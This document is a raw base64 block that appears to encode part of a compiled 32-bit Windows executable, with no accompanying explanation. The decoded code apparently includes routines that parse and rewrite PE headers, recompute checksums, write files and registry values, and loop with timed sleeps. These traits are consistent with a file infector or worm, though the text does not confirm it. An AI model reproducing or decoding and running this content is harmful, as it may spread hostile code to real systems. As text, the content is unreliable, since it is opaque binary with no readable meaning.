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
VYvsgewIAQAAgKX4/v//AI2F+P7//2oBUOhf3P//jUX8UI2F+P7//2gIX0AAUGgCAACA6PPl
//+DxBhogO42AP8VLNFAAOvBVYvsg30MAHU0g30QAHUIagX/FSzRQAD/dQjoftz//4XAWXwU
g/gDfQ//dQho7DdJAOhsFgAAWVlqAVhdw/91COjT/f//hcBZdAQzwF3DM8A5RRAPlMBdw1WL
7IHsDAEAAICl9P7//wBTjYX0/v//aAQBAABQagFobQlBAOhP0///WVlQaFICQQBoAgAAgOiu
5P//jYX0/v//UOh5/f//D76F9P7//4qd9v7//1DobhkAAIPEHINl+ACIRf+KRfgEYTpF/3Q8
gKX2/v//AIiF9P7//42F9P7//1D/FczQQACD+AOInfb+//91F/91CI2F9P7//2iuYEAAUOhv
3f//g8QM/0X4g334GnyxM8BbycIEAFZohQlBAP90JBDogRUAAIt0JBBW6GcWAACDxAwzyYXA
fguAPDFAdAVBO8h89Ug7yHwEM8Bew41EMQFQ/3QkEOhcFQAAWVlqAVhew1WL7IHsFAIAAIA9
1DJJAABWD4SbAAAAgD3QMUkAAA+EjgAAAIN9EACLdQh0ElboA7b///91DFbo0sD//4PEDGpk
aAABAABqGWjUMkkAjY3s/f//6NjJ//9qBGoKjUWcagNQ6L3U//+DxBCNRZyNjez9//9Q6DvO
//+DxmSNjez9//9W6OrO//9o0DFJAI2N7P3//+gxzv//jY3s/f//6MTK//+FwHQQjY3s/f//
6FDK//8zwF7Jw/91DOh2FQAAWVCNjez9////dQzo9Mr//42N7P3//4vw6CbK//8zwIX2D5TA
689Vi+yB7BgDAABWi3UIjYXo/P//UFbotv7//1mFwFl1BzPA6boAAACDfRAAdBJW6B61////
dQxW6O2///+DxAxqZGgAAQAAjYXo/P//ahlQjY3s/f//6PHI//9qBGoKjUWcagNQ6NbT//+D
xBCNRZyNjez9//9Q6FTN//+NRmSNjez9//9Q6APO//9WjY3s/f//6E7N//+Njez9///o4cn/
/4XAdBCNjez9///obcn//+lr/////3UM6JMUAABZUI2N7P3///91DOgRyv//jY3s/f//i/Do
Q8n//zPAhfYPlMBeycNVi+yB7AAIAACApQD4//8AgKUA/P//AI2FAPj//1D/dQjoxv3//42F
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
